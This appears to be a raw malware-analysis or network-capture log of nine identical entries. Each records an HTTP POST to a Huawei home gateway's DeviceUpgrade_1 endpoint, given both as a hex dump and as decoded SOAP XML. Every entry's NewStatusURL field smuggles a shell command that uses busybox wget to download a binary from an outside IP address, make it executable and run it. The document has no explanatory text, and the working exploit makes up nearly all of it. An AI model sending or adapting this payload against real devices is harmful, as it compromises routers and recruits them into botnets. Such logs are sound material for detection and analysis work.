Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
